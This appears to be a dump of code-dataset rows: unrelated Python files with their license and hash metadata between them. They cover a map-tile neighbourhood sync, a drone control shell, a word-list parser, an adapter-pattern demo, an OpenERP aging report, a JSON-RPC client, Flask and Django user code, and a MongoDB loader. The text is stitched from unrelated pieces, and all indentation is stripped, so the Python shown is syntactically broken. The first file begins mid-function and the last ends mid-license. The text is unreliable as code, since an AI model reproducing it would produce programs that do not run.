meta_macrohoods_thread.join()
meta_boroughs_thread.join()
self.logger.info('Fetching old and new neighbourhoods ... done')
prev_neighbourhoods = prev_neighbourhoods_queue.get()
meta_neighbourhoods = meta_neighbourhoods_queue.get()
meta_microhoods = meta_microhoods_queue.get()
meta_macrohoods = meta_macrohoods_queue.get()
meta_boroughs = meta_boroughs_queue.get()
# each of these has the appropriate placetype set now
meta_neighbourhoods = (
meta_neighbourhoods + meta_microhoods + meta_macrohoods +
meta_boroughs)
self.logger.info('Diffing neighbourhoods ...')
by_neighborhood_id = attrgetter('wof_id')
# the model is expected to return records in ascending order by id
# it doesn't seem like the neighbourhoods in the wof csv
# are in ascending order, so we sort explicitly here
meta_neighbourhoods.sort(key=by_neighborhood_id)
# the diff algorithm depends on the neighbourhood lists
# being in sorted order by id
diffs = diff_neighbourhoods(prev_neighbourhoods,
meta_neighbourhoods)
self.logger.info('Diffing neighbourhoods ... done')
# we need to fetch neighbourhoods that have either been
# updated or are new
wof_neighbourhoods_to_fetch = []
# based on the diff, we'll need to keep track of how we'll
# need to update
ids_to_add = set()
ids_to_update = set()
ids_to_remove = set()
for dx, dy in diffs:
if dy is not None:
if dx is None:
ids_to_add.add(dy.wof_id)
else:
ids_to_update.add(dy.wof_id)
wof_neighbourhoods_to_fetch.append(dy)
else:
ids_to_remove.add(dx.wof_id)
if wof_neighbourhoods_to_fetch:
self.logger.info('Fetching %d raw neighbourhoods ...' %
len(wof_neighbourhoods_to_fetch))
raw_neighbourhoods, failures = (
self.fetcher.fetch_raw_neighbourhoods(
wof_neighbourhoods_to_fetch))
self.logger.info('Fetching %d raw neighbourhoods ... done' %
len(wof_neighbourhoods_to_fetch))
else:
self.logger.info('No raw neighbourhoods found to fetch')
raw_neighbourhoods = ()
failures = []
# we should just remove any neighbourhoods from add/update lists
# also keep track of these ids to remove from the diffs too
failed_wof_ids = set()
superseded_by_wof_ids = set()
funky_wof_ids = set()
for failure in failures:
failure_wof_id = failure.wof_id
log_failure(self.logger, failure)
if failure.funky:
# this scenario is triggered for new neighbourhoods,
# or if a neighbourhood became funky
# we handle both of these scenarios in tests later on,
# but for now we just track the id of the funky
# neighbourhoods
funky_wof_ids.add(failure_wof_id)
if failure.superseded:
self.logger.warn(
'superseded_by inconsistency for %s' % failure_wof_id)
# this means that we had a value for superseded_by in
# the raw json, but not in the meta file
# this should get treated as a removal
superseded_by_wof_ids.add(failure_wof_id)
failed_wof_ids.add(failure_wof_id)
ids_to_add.discard(failure_wof_id)
ids_to_update.discard(failure_wof_id)
# we'll only log the number of funky records that we found
if funky_wof_ids:
self.logger.warn('Number of funky neighbourhoods: %d' %
len(funky_wof_ids))
# now we'll want to ensure that the failed ids are not present
# in any additions or updates
new_diffs = []
for n1, n2 in diffs:
if n2 is None or n2.wof_id not in failed_wof_ids:
new_diffs.append((n1, n2))
diffs = new_diffs
# and we'll want to also treat any superseded_by
# inconsistencies as removals
# but we need the original neighbourhood meta object to
# generate the diff, for its label position to expire the
# appropriate tile
if superseded_by_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in superseded_by_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
# if the neighbourhood became funky and we had it in our
# existing set, we'll want to remove it
if funky_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in funky_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
sync_neighbourhoods_thread = None
if diffs:
self.logger.info("Sync'ing neighbourhoods ...")
# raw_neighbourhoods contains both the neighbourhoods to
# add and update
# we split it up here
neighbourhoods_to_update = []
neighbourhoods_to_add = []
for neighbourhood in raw_neighbourhoods:
if neighbourhood.wof_id in ids_to_add:
neighbourhoods_to_add.append(neighbourhood)
elif neighbourhood.wof_id in ids_to_update:
neighbourhoods_to_update.append(neighbourhood)
else:
assert 0, '%d should have been found to add or update' % (
neighbourhood.wof_id)
if neighbourhoods_to_add:
self.logger.info('Inserting neighbourhoods: %d' %
len(neighbourhoods_to_add))
if neighbourhoods_to_update:
self.logger.info('Updating neighbourhoods: %d' %
len(neighbourhoods_to_update))
if ids_to_remove:
self.logger.info('Removing neighbourhoods: %d' %
len(ids_to_remove))
def _sync_neighbourhoods():
self.model.sync_neighbourhoods(
neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove)
sync_neighbourhoods_thread = threading.Thread(
target=_sync_neighbourhoods)
sync_neighbourhoods_thread.start()
else:
self.logger.info('No diffs found, no sync necessary')
if diffs:
self.logger.info('Generating tile expiry list ...')
expired_coord_ints = generate_tile_expiry_list(
self.zoom_expiry, diffs)
self.logger.info(
'Generating tile expiry list ... done - '
'Found %d expired tiles' % len(expired_coord_ints))
else:
self.logger.info('No diffs found, not generating expired coords')
expired_coord_ints = set()
# ensure we're done fetching the tiles of interest by this point
toi_thread.join()
toi = toi_queue.get()
self.logger.info('Have tiles of interest')
# we need to finish sync'ing neighbourhoods before we flip the
# visibility flag and enqueue coordinates
if sync_neighbourhoods_thread is not None:
sync_neighbourhoods_thread.join()
self.logger.info("Sync'ing neighbourhoods ... done")
# update the current timestamp, returning the list of coords that
# have changed visibility.
visibility_updates = \
self.model.update_visible_timestamp(
self.zoom_expiry, self.current_date)
self.logger.info('Have %d tile expiries from visibility changes.'
% len(visibility_updates))
expired_coord_ints.update(visibility_updates)
if diffs:
# intersect the tiles of interest with the expired coords from
# the neighbourhood diff
self.logger.info('Intersecting %d tiles of interest with %d '
'expired tiles' % (
len(toi), len(expired_coord_ints)))
toi_expired_coord_ints, _ = self.intersector(
expired_coord_ints, toi, self.zoom_until)
coords = map(coord_unmarshall_int, toi_expired_coord_ints)
self.logger.info('Intersection complete, will expire %d tiles' %
len(coords))
else:
self.logger.info('No diffs found, no need to intersect')
coords = ()
if coords:
self.logger.info('Asking enqueuer to enqueue %d coords ...' %
len(coords))
self.rawr_enqueuer(coords)
self.logger.info('Asking enqueuer to enqueue %d coords ... done' %
len(coords))
else:
self.logger.info('No expired tiles to enqueue')
class WofInitialLoader(object):
def __init__(self, fetcher, model, logger):
self.fetcher = fetcher
self.model = model
self.logger = logger
def __call__(self):
self.logger.info('Fetching meta neighbourhoods csv ...')
neighbourhood_metas = list(self.fetcher.fetch_meta_neighbourhoods())
self.logger.info('Fetching meta neighbourhoods csv ... done')
self.logger.info('Fetching meta microhoods csv ...')
microhood_metas = list(self.fetcher.fetch_meta_microhoods())
self.logger.info('Fetching meta microhoods csv ... done')
self.logger.info('Fetching meta macrohoods csv ...')
macrohood_metas = list(self.fetcher.fetch_meta_macrohoods())
self.logger.info('Fetching meta macrohoods csv ... done')
self.logger.info('Fetching meta boroughs csv ...')
borough_metas = list(self.fetcher.fetch_meta_boroughs())
self.logger.info('Fetching meta boroughs csv ... done')
neighbourhood_metas = (
neighbourhood_metas + microhood_metas + macrohood_metas +
borough_metas)
self.logger.info('Fetching raw neighbourhoods ...')
neighbourhoods, failures = self.fetcher.fetch_raw_neighbourhoods(
neighbourhood_metas)
for failure in failures:
log_failure(self.logger, failure)
self.logger.info('Fetching raw neighbourhoods ... done')
self.logger.info('Inserting %d neighbourhoods ...' %
len(neighbourhoods))
self.model.insert_neighbourhoods(neighbourhoods)
self.logger.info('Inserting %d neighbourhoods ... done' %
len(neighbourhoods))
def make_wof_url_neighbourhood_fetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
data_prefix_url, n_threads, max_retries):
fetcher = WofUrlNeighbourhoodFetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
data_prefix_url, n_threads, max_retries)
return fetcher
def make_wof_filesystem_neighbourhood_fetcher(wof_data_path, n_threads):
fetcher = WofFilesystemNeighbourhoodFetcher(
wof_data_path, n_threads)
return fetcher
def make_wof_model(postgresql_conn_info):
wof_model = WofModel(postgresql_conn_info)
return wof_model
def make_wof_processor(
fetcher, model, redis_cache_index, rawr_enqueuer, logger,
current_date):
from tilequeue.command import explode_and_intersect
wof_processor = WofProcessor(
fetcher, model, redis_cache_index, explode_and_intersect,
rawr_enqueuer, logger, current_date)
return wof_processor
def make_wof_initial_loader(fetcher, model, logger):
wof_loader = WofInitialLoader(fetcher, model, logger)
return wof_loader
|
mit
| 9,120,416,503,911,111,000
| 35.280757
| 79
| 0.582449
| false
| 3.652271
| false
| false
| false
|
Tala/bybop
|
src/interactive.py
|
1
|
1944
|
#!/usr/bin/env python
import sys
try:
import readline
except ImportError:
import pyreadline as readline
import os
import code
import rlcompleter
lib_path = os.path.abspath(os.path.join('..', 'src'))
sys.path.append(lib_path)
lib_path = os.path.abspath(os.path.join('..', '..', 'ARSDKBuildUtils', 'Utils', 'Python'))
sys.path.append(lib_path)
from Bybop_Discovery import *
import Bybop_Device
print('Searching for devices')
from zeroconf import ZeroconfServiceTypes
print('\n'.join(ZeroconfServiceTypes.find()))
print('done.')
discovery = Discovery([DeviceID.BEBOP_DRONE, DeviceID.JUMPING_SUMO, DeviceID.AIRBORNE_NIGHT, DeviceID.JUMPING_NIGHT])
discovery.wait_for_change()
devices = discovery.get_devices()
#discovery.stop()
if not devices:
print('Oops ...')
sys.exit(1)
device = devices.itervalues().next()
print('Will connect to ' + get_name(device))
d2c_port = 43210
controller_type = "PC"
controller_name = "bybop shell"
drone = Bybop_Device.create_and_connect(device, d2c_port, controller_type, controller_name)
if drone is None:
print('Unable to connect to a product')
sys.exit(1)
drone.dump_state()
vars = globals().copy()
vars.update(locals())
readline.set_completer(rlcompleter.Completer(vars).complete)
readline.parse_and_bind("tab: complete")
shell = code.InteractiveConsole(vars)
# drone.jump(0) # jump forward
# drone.jump(1) # jump up
# drone.move_forward(20) # move forwards
# drone.move_forward(-20) # move backwards
# drone.move(0,50) # turn right?
# drone.move(0,-50) # turn left?
# drone.spin() # spin around
# drone.simpleAnimation(0)
# drone.simpleAnimation(9)
# Currently known values:
# - 0 : stop
# - 1 : spin
# - 2 : tap
# - 3 : slowshake
# - 4 : metronome
# - 5 : ondulation
# - 6 : spinjump
# - 7 : spintoposture
# - 8 : spiral
# - 9 : slalom
# """
shell.interact()
drone.stop()
|
bsd-3-clause
| -245,576,819,196,394,050
| 21.870588
| 117
| 0.667181
| false
| 2.901493
| false
| false
| false
|
JDongian/LangGrind
|
src/parse_raw.py
|
1
|
1957
|
"""Parse human data into JSON"""
import string
def parse_file(filename="../data/RAW.txt"):
"""Parse human readable file into JSON."""
entries = []
with open(filename) as f_in:
next_line = f_in.readline()
data = {}
state = "section"
while next_line:
if state == "section":
line = next_line.split(" ")
if line[0] == "Chapter":
data = {'section': {'chapter': int(line[1]),
'part': line[4].strip()}}
state = "term"
elif state == "term":
if not next_line.strip():
state = "section"
next_line = f_in.readline()
continue
entry = data.copy()
term, definition = next_line.split(";")
#print("'{}'".format(next_line))
entry['term'] = term.strip()
entry['definitions'] = [_.strip() for\
_ in definition.split(",")]
entry['class'] = []
# Determine the lexical class of the word.
if "(be)" in "".join(entry['definitions']):
entry['class'].append("adjective")
for _ in entry['definitions']:
initial = _.split(" ")[0]
end = _[-1]
if initial in ["a", "an"]:
entry['class'].append("noun")
if initial in ["to"]:
entry['class'].append("verb")
if end in ".!?":
entry['class'].append("phrase")
# Proper nouns
elif initial[0] in string.ascii_uppercase:
entry['class'].append("noun")
entries.append(entry)
next_line = f_in.readline()
return entries
|
gpl-3.0
| 6,378,814,179,138,106,000
| 38.14
| 67
| 0.406234
| false
| 4.832099
| false
| false
| false
|
prateeksan/python-design-patterns
|
structural/adapter.py
|
1
|
3485
|
""" The Adapter Pattern
Notes:
If the interface of an object does not match the interface required by the
client code, this pattern recommends using an 'adapter' that can create a proxy
interface. It is particularly useful in homogenizing interfaces of
non-homogenous objects.
The following example represents a use case for adapting various resource
types to be readable as text resources. We assume that the client programmer
works with resource objects that wrap binary, web-based or textual data. Each
of the aforementioned has its own type and interface but we need to read them
all as text type objects. Since every resource type can be represented as text
(albeit the method calls to do so vary), we use the TextResourceAdapter to
homogenize the interface and output the textual representation using a common
read() method (set to behave like the read() method for TextResource).
"""
class TextResource:
"""We assume that our server can only read text. Therefore this resource is
the only resource the server knows how to interpret.
"""
def read(self):
return "Sample plain text."
class BinaryResource:
"""An instance of this class wraps binary data. While it has many output
formats, the server can only read the plain-text output.
"""
def read_plain_text(self):
return "Sample plain text from binary."
def read_raw(self):
pass
def read_interactive(self):
pass
class WebResource:
"""An instance of this class wraps web data. While it has many output
formats, the server can only read the json output.
"""
def read_json(self):
return "Sample plain text as json."
def read_html(self):
pass
class IncompatibleResourceError(Exception):
pass
class TextResourceAdapter:
"""Acts as an adapter that uses the read() method to return a textual
representation of the client_resource.
"""
convertibles = ("TextResource", "BinaryResource", "WebResource")
def __init__(self, client_resource):
self._verify_compatibility(client_resource)
self._client_resource = client_resource
def read(self):
"""Note that for a resource to use the adapter, it needs to be
configured beforehand in this method. Your implementation may be
modified to change this (depending on your use case).
"""
if self._client_resource.__class__ is BinaryResource:
return self._client_resource.read_plain_text()
elif self._client_resource.__class__ is WebResource:
return self._client_resource.read_json()
return self._client_resource.read()
def _verify_compatibility(self, resource):
"""Since we need to pre-configure the adapter to handle various resource
types, we raise an error if the client_resource is not pre-configured.
"""
if resource.__class__.__name__ not in self.__class__.convertibles:
raise IncompatibleResourceError("{} cannot be adapted.".format(
resource.__class__.__name__))
if __name__ == "__main__":
client_resources = [BinaryResource(), WebResource(), TextResource()]
for resource in client_resources:
print("Adapting {} as a text resource...".format(
resource.__class__.__name__))
adapted_resource = TextResourceAdapter(resource)
# Note how the read interface has been homogenized.
print(adapted_resource.read() + "\n")
|
mit
| 5,776,622,469,529,610,000
| 32.84466
| 80
| 0.68637
| false
| 4.456522
| false
| false
| false
|
3dfxsoftware/cbss-addons
|
account_aged_partner_balance_report/report/account_aged_partner_balance_report.py
|
1
|
10928
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pooler
from report import report_sxw
from tools.translate import _
from openerp.osv import fields, osv
from openerp.addons.account_report_lib.account_report_base import accountReportbase
class Parser(accountReportbase):
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'cr' : cr,
'uid': uid,
'storage':{},
'set_data_template': self.set_data_template,
'set_data_move_lines': self.set_data_move_lines,
'get_data':self.get_data,
'get_data_by_partner':self.get_data_by_partner,
'get_period_length': self.get_period_length,
'get_direction_selection': self.get_direction_selection,
'display_account_type':self.display_account_type,
'display_direction_selection': self.display_direction_selection,
'display_period_length': self.display_period_length,
'process_lines_period':self.process_lines_period,
})
#====Extract data from wizard==============================================
def get_period_length(self, data):
return self._get_form_param('period_length', data)
def get_direction_selection(self, data):
return self._get_form_param('direction_selection', data)
def get_account_type(self, data):
return self._get_form_param('account_type', data)
"""
Return a dictionary, with this structure:
result[account_type][move_list_lines] (a dictionary)
"""
def get_data_by_partner(self, partner_id):
return self.localcontext['storage']['result'][partner_id]
#==========================================================================
#====Display data==========================================================
def display_account_type(self, data=None, account_type=None):
#if it's necessary to display in report's header
if data:
account_type = self.get_account_type(data)
##Options for report information (keys are different)
if account_type == 'receivable':
return _('Receivable Accounts')
elif account_type == 'payable':
return _('Payable Accounts')
###Options for header
if account_type == 'customer':
return _('Receivable accounts')
elif account_type == 'supplier':
return _('Payable accounts')
elif account_type == 'customer_supplier':
return _('Payable and Receivable accounts')
return ''
def display_direction_selection(self, data):
direction_selection = self.get_direction_selection(data)
if direction_selection == 'past':
return _('Past')
elif direction_selection == 'future':
return _('Future')
return ''
def display_period_length(self, data):
return self.get_period_length(data)
#===== Set data =========================================================
#set data to use in odt template.
def set_data_template(self, cr, uid, data):
result, partner_ids_order = self.get_data(cr, uid, data)
dict_update = {'result': result, 'partner_ids_order': partner_ids_order,}
self.localcontext['storage'].update(dict_update)
return False
def set_data_move_lines(self, data, move_lines):
#move_lines is a dictionary
move_lines, partner_total = self.process_lines_period(data, move_lines)
dict_update = {'move_lines':move_lines, 'partner_total':partner_total}
self.localcontext['storage'].update(dict_update)
return False
#==========================================================================
def get_move_lines(self, data):
account_account_obj = self.pool.get('account.account')
account_move_line_obj = self.pool.get('account.move.line')
account_type_domain = []
#Get parameters
date_from = str(self.get_date_from(data))
direction_selection = str(self.get_direction_selection(data))
account_type = self.get_account_type(data)
if account_type == 'customer':
account_type_domain.append('receivable')
if account_type == 'supplier':
account_type_domain.append('payable')
if account_type == 'customer_supplier':
account_type_domain.append('receivable')
account_type_domain.append('payable')
#Build domains
account_account_ids = account_account_obj.search(self.cr, self.uid, [('type', 'in', account_type_domain), ('active','=',True)])
account_move_line_domain = [('state', '=', 'valid'), ('reconcile_id', '=', False), ('account_id', 'in', account_account_ids)]
#=====Build a account move lines domain
#Date
tuple_date = ()
if direction_selection == 'past':
tuple_date = ('date','<=', date_from)
account_move_line_domain.append(tuple_date)
else:
tuple_date = ('date','>=', date_from)
account_move_line_domain.append(tuple_date)
#Get move_lines based on previous domain
account_move_line_ids = account_move_line_obj.search(self.cr, self.uid, account_move_line_domain, order='date_maturity desc')
account_move_lines = account_move_line_obj.browse(self.cr, self.uid, account_move_line_ids)
return account_move_lines
def get_data(self, cr, uid, data):
partner_ids = []
res = {}
""" 1. Extract move lines """
move_lines = self.get_move_lines(data)
""" 2. Classified move_lines by partner and account_type """
for line in move_lines:
if line.partner_id:
partner_id = line.partner_id.id
else:
partner_id = 0 #key for lines that don't have partner_id
#== Create a list, them order it by name ============
if partner_id not in partner_ids:
partner_ids.append(partner_id)
#====================================================
if partner_id not in res.keys():
res[partner_id] = {}
if line.account_id.type not in res[partner_id].keys():
res[line.partner_id.id][line.account_id.type] = []
res[partner_id][line.account_id.type].append(line)
#Sort by partner's name (alphabetically)
partner_ids_order = self.pool.get('res.partner').search(cr, uid, [('id','in', partner_ids)], order='name ASC')
partner_list = self.pool.get('res.partner').browse(self.cr, self.uid, partner_ids_order)
return res, partner_list
#Process each column for line.
def process_lines_period(self, data, move_lines):
res = {}
partner_total = 0.0
result_list = [7]
#Get parameters
date_from = str(self.get_date_from(data))
direction_selection = str(self.get_direction_selection(data))
for line in move_lines:
result_list = map(float, result_list)
#initialize list
result_list = [0.0 for i in range(7)]
if not line.date_maturity or direction_selection == 'past' and line.date_maturity > date_from \
or direction_selection == 'future' and line.date_maturity < date_from:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[0] = value
if line.date_maturity >= data['form']['4']['start'] and line.date_maturity <= data['form']['4']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[1] = value
if line.date_maturity >= data['form']['3']['start'] and line.date_maturity <= data['form']['3']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[2] = value
if line.date_maturity >= data['form']['2']['start'] and line.date_maturity <= data['form']['2']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[3] = value
if line.date_maturity >= data['form']['1']['start'] and line.date_maturity <= data['form']['1']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[4] = value
if line.date_maturity and data['form']['0']['stop'] and line.date_maturity <= data['form']['0']['stop'] or line.date_maturity and data['form']['0']['start'] and line.date_maturity >= data['form']['0']['start']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[5] = value
#Total by partner
partner_total += line.debit if line.debit else line.credit * -1
result_list[6] = partner_total
res[line.id] = result_list
return res, partner_total
|
gpl-2.0
| 284,019,789,491,869,440
| 41.858824
| 221
| 0.522053
| false
| 4.333069
| false
| false
| false
|
nosuchtim/VizBench
|
src/jsonrpc/jsonrpc.py
|
1
|
1044
|
# Utility to send JSON RPC messages
# Avoid the requests module to reduce installation hassles
import urllib
import urllib2
import json
import sys
verbose = False
def dorpc(port,meth,params):
url = 'http://127.0.0.1:%d/api' % (port)
id = '12345'
data = '{ "jsonrpc": "2.0", "method": "'+meth+'", "params": '+params+', "id":"'+id+'" }\n'
req = urllib2.Request(url,data)
r = urllib2.urlopen(req)
response = r.read()
if verbose:
print "HTTP status code = ",r.getcode()
print "HTTP url = ",r.geturl()
print "HTTP info = ",r.info()
print "response is ",response
j = json.loads(response)
if "error" in j:
print "ERROR: "+str(j["error"]["message"])
elif "result" in j:
print "RESULT: "+str(j["result"])
else:
print "No error or result in JSON response!? r="+r
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: jsonrpc {port} {meth} [ {params} ]"
else:
port = int(sys.argv[1])
meth = sys.argv[2]
if len(sys.argv) < 4:
params = "{}"
else:
params = sys.argv[3]
dorpc(port,meth,params)
|
mit
| 6,698,785,829,892,262,000
| 22.2
| 91
| 0.6159
| false
| 2.690722
| false
| false
| false
|
h4wldev/Frest
|
app/routes/api/v1/users/user.py
|
1
|
6676
|
# # -*- coding: utf-8 -*-
import re
import datetime
from flask import request
from flask_api import status
from flask_restful import Resource
from sqlalchemy.exc import IntegrityError
from werkzeug.security import generate_password_hash
from app import db, token_auth
from app.models.user_model import UserModel, get_user
from app.models.user_token_model import token_is_auth, token_load_with_auth, token_expire_all, token_delete_all
from app.modules import frest
from app.modules.frest.api.error import get_exists_error
from app.modules.frest.validate import user as userValidate
from app.modules.frest.serialize.user import serialize_user
_URL = '/users/<prefix>'
class User(Resource):
"""
@api {get} /users/:prefix Get particular user's info
@apiName User Info
@apiGroup Users
@apiHeader {String} Authorization Access token.
@apiHeaderExample {json} Header-Example:
{
"Authorization": "304924"
}
@apiParam {String} prefix user's prefix
@apiSuccess (200) {String} data Users data.
@apiError (401) UnAuthorized You don't have permission.
@apiError (400) ValueError Prefix can only be me or number
"""
@frest.API
@token_auth.login_required
def get(self, prefix):
try:
if prefix == 'me':
user_id = token_load_with_auth(request.headers['Authorization'])['user_id']
else:
user_id = int(prefix)
if token_is_auth(request.headers['Authorization'], user_id):
user = get_user(user_id)
return serialize_user(user), status.HTTP_200_OK
else:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
except ValueError:
return "Prefix can only be me or a number.", status.HTTP_400_BAD_REQUEST
"""
@api {put} /users/:prefix Update user info
@apiName Update user info
@apiGroup Users
@apiPermission Admin
@apiHeader {String} Authorization Access token.
@apiHeaderExample {json} Header-Example:
{
"Authorization": "304924"
}
@apiParam {String} prefix user's prefix
@apiSuccess (200) None
@apiError (400) BadRequest Invalid input - Prefix can only be me or a number.
@apiError (401) UnAuthorized You don't have permission - Should be admin.
@apiError (404) NotFound User not found.
"""
@frest.API
@token_auth.login_required
def put(self, prefix):
try:
if prefix == 'me':
user_id = token_load_with_auth(request.headers['Authorization'])['user_id']
else:
user_id = int(prefix)
user_query = UserModel.query \
.filter(UserModel.id == user_id)
if token_is_auth(request.headers['Authorization'], user_id):
user_permission = token_load_with_auth(request.headers['Authorization'])['permission']
if user_permission != 'ADMIN' and request.form.get('permission') is not None:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
form = userValidate.modificationForm(request.form)
if form.validate():
if user_query.count():
user = user_query.first()
try:
for key, value in request.form.items():
if value is not None and value != '':
if key == 'password':
value = generate_password_hash(value)
token_expire_all(user.id)
setattr(user, key, value)
user.updated_at = datetime.datetime.now()
db.session.commit()
except IntegrityError as e:
field, value = get_exists_error(e)
_return = {
'message': "'" + value + "' is already exists.",
'field': {
'label': getattr(form, field).label.text,
'name': field
}
}
return _return, status.HTTP_400_BAD_REQUEST
return None, status.HTTP_200_OK
else:
return "The user does not exist.", status.HTTP_404_NOT_FOUND
for field, errors in form.errors.items():
for error in errors:
_return = {
'message': error,
'field': getattr(form, field).label.text
}
return _return, status.HTTP_400_BAD_REQUEST
else:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
except ValueError:
return "Prefix can only be me or a number.", status.HTTP_400_BAD_REQUEST
"""
@api {delete} /users/:prefix Delete user
@apiName User Delete
@apiGroup Users
@apiHeader {String} Authorization Access token.
@apiHeaderExample {json} Header-Example:
{
"Authorization": "304924"
}
@apiParam {String} prefix user's prefix
@apiSuccess (200) None
@apiError (404) NotFound User not found.
@apiError (401) UnAuthorized You don't have permission.
@apiError (400) ValueError Prefix can only be me or number
"""
@frest.API
@token_auth.login_required
def delete(self, prefix):
try:
if prefix == 'me':
user_id = token_load_with_auth(request.headers['Authorization'])['user_id']
else:
user_id = int(prefix)
user_query = UserModel.query \
.filter(UserModel.id == user_id)
if token_is_auth(request.headers['Authorization'], user_id):
if user_query.count():
token_delete_all(user_id)
user = user_query.first()
db.session.delete(user)
db.session.commit()
return None, status.HTTP_200_OK
else:
return "The user does not exist.", status.HTTP_404_NOT_FOUND
else:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
except ValueError:
return "Prefix can only be me or a number.", status.HTTP_400_BAD_REQUEST
|
mit
| 2,234,537,345,375,100,000
| 33.770833
| 111
| 0.539994
| false
| 4.532247
| false
| false
| false
|
Nikola-K/django_reddit
|
users/models.py
|
1
|
1565
|
from hashlib import md5
import mistune
from django.contrib.auth.models import User
from django.db import models
class RedditUser(models.Model):
user = models.OneToOneField(User)
first_name = models.CharField(max_length=35, null=True, default=None,
blank=True)
last_name = models.CharField(max_length=35, null=True, default=None,
blank=True)
email = models.EmailField(null=True, blank=True, default=None)
about_text = models.TextField(blank=True, null=True, max_length=500,
default=None)
about_html = models.TextField(blank=True, null=True, default=None)
gravatar_hash = models.CharField(max_length=32, null=True, blank=True,
default=None)
display_picture = models.NullBooleanField(default=False)
homepage = models.URLField(null=True, blank=True, default=None)
twitter = models.CharField(null=True, blank=True, max_length=15,
default=None)
github = models.CharField(null=True, blank=True, max_length=39,
default=None)
comment_karma = models.IntegerField(default=0)
link_karma = models.IntegerField(default=0)
def update_profile_data(self):
self.about_html = mistune.markdown(self.about_text)
if self.display_picture:
self.gravatar_hash = md5(self.email.lower().encode('utf-8')).hexdigest()
def __unicode__(self):
return "<RedditUser:{}>".format(self.user.username)
|
apache-2.0
| -6,009,276,806,158,894,000
| 42.472222
| 84
| 0.628754
| false
| 3.95202
| false
| false
| false
|
selentd/pythontools
|
pytools/src/oldsrc/addindex.py
|
1
|
2335
|
import datetime
import pymongo
from pymongo.mongo_client import MongoClient
import indexdata
def getIndexEntry( indexData ):
return indexData.getDictionary()
def getIndexDateEntry( indexData ):
return { "date": datetime.datetime(indexData.date.year,
indexData.date.month,
indexData.date.day,
0,
0)
}
def getIndexHistory( source, size = 10000000 ):
indexHistory = indexdata.IndexHistory(source, size)
indexHistory.readIndex()
return indexHistory
def addIndex( source, dbName, indexName ):
#client = MongoClient("192.168.81.147")
client = MongoClient("127.0.0.1")
database = client[dbName]
collection = database[indexName]
collection.create_index([("date", pymongo.ASCENDING)],
name="date",
unique=True)
indexHistory = getIndexHistory(source)
for indexData in indexHistory.indexHistory:
indexEntry = getIndexEntry(indexData)
indexDate = getIndexDateEntry(indexData)
if collection.find_one(indexDate) == None:
collection.insert(indexEntry)
def addIndizes():
'''
addIndex('../../data/sp500.csv', 'stockdb', 'sp500')
addIndex('../../data/tecdax.csv', 'stockdb', 'tecdax')
addIndex('../../data/mdax.csv', 'stockdb', 'mdax')
addIndex('../../data/nasdaq100.csv', 'stockdb', 'nasdaq100')
addIndex('../../data/smi.csv', 'stockdb', 'smi')
addIndex('../../data/tecdax.csv', 'stockdb', 'tecdax')
'''
indexList = ['atx',
'brent',
'cac',
'dax',
'dowjones',
'estoxx50',
'ftse100',
'ftsemib',
'gold',
'hangseng',
'hscei',
'ibex',
'mdax',
'nasdaq100',
'nikkei',
'sdax',
'smi',
'sp500',
'tecdax']
for index in indexList:
print '../../data/'+index+'.csv'
addIndex('../../data/'+index+'.csv', 'stockdb', index)
if __name__ == '__main__':
addIndizes()
|
apache-2.0
| 2,964,568,120,293,750,000
| 28.556962
| 64
| 0.494647
| false
| 3.964346
| false
| false
| false
|
Rezzie/Batcher
|
generators/g_randomchoice.py
|
1
|
2268
|
#!/usr/bin/env python
# Copyright (c) 2011, The University of York
# All rights reserved.
# Author(s):
# James Arnold <jarnie@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the The University of York nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF YORK BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
